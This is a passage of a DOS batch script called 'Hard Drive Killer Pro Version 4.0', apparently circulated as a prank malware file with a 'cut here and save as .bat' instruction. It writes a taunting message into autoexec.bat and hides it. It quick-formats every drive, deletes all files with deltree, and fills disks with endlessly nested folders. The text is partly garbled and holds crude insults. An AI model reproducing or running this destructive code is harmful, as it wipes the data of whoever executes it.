CD / >> C: /autoexec.bat Echo CLS >> C: /autoexec.bat Echo echo welcome to the land of death. Munga bunga's multiple hard drive killer version 4.0. >> c: /autoexec.bat Echo echo if you ran this file, the made it. The purpose of this program is to tell you the following.. >> C: /autoexec.bat Echo echo 1. To make people aware trurity shouth c: /autoexec.bat Echo Echo 2. Love Is Important, IF you have it, truly, don't let Go of It Like i DID! >> C: /autoexec.bat Echo Echo 3. if you are not a vegetarian, the you are a murder, and i'm glad your hd is dead. >> c: /autoexec.bat Echo Echo 4. Don't Support The Following: War, Racism, Drugs and The LibERAL Party. >> C: /autoexec.bat Echo echo. >> C: /autoexec.bat echo echo regards, >> c: /autoexec.bat Echo echo. >> C: /autoexec.bat Echo Echo Munga Bunga >> C: /autoexec.bat Call Attrib R H C: /autoexec.bat : Makedir If EXIST C: /TEMP.BAT Attrib -R -H C: /TEMP.BAT> Nulecho @echo off> c: /Temp.bat Echo %% 1: / >> C: /TEMP.BAT Echo CD / >> C: /TEMP.BAT Echo: startmd >> C: /TEMP.BAT Echo for %%%% a in ("if not exist %% 2 / NUL MD %% 2" "if exist %% 2 / NUL CD %% 2") DO %%%% A >> C: / TEMP. bat Echo for %%%% a in ("> ass_hole.txt") DO Echo %%%% a Your Gone @ $$ Hole !!!! >> C: /Temp.bat Echo if not exist %% 1: / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 /% % 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 / %% 2 /% % 2 / %% 2 / %% 2 / NUL GOTO STARTMD >> C: /TEMP.BAT Call Attrib R H C: /Temp.bat> NUL CLS .. Rem deltree / y %% A: / *. Only Eliminates Directories, Hence Leaving The File Created Above for Further Destruction. For %% a in (% drive%) Do Call Format %% A: / Q / U / AutoSample> NUL CLS .. .. For %% a in (% drive%) Do Call C: /Temp.bat %% a Munga> NUL CLS .. .. .. For %% a in (% drive%) Call attrib -r -h %% A: / / / / / / s> NUL Call Attrib R H C: /Temp.bat> NUL Call Attrib R H C: /autoexec.bat> NUL CLS .. .. .. .. For %% a in (% drive%) Call deltree / y %% a: / *.> NUL CLS .. .. .. .. .. For %% a in (% drive%) Do Call C: /Temp.bat %% a Munga> NUL CLS YOUNGA PRODUCT.ECHO. Echo Oh and Bill Gates Rules, And He Is Not a Geek, He is A Good Looking Genius. echo. .. echo. Echo Q). What's the WORST Thing About Being An Egg? Echo a). You Only get laid. echo. Echo Hahahaha, Get it? don't you just love what one? echo. Echo regards, echo. Echo Munga Bunga : END: END Rem Hard Drive Killer Pro Version 4.0, Enjoy !!!! Rem Author: Munga Bunga - From Australia, The Land Full of Retarded Australian'S (Help Me Get Out of Here). ------------------------ Cut Here the Save as .bat or .cmd file --------------- ----------------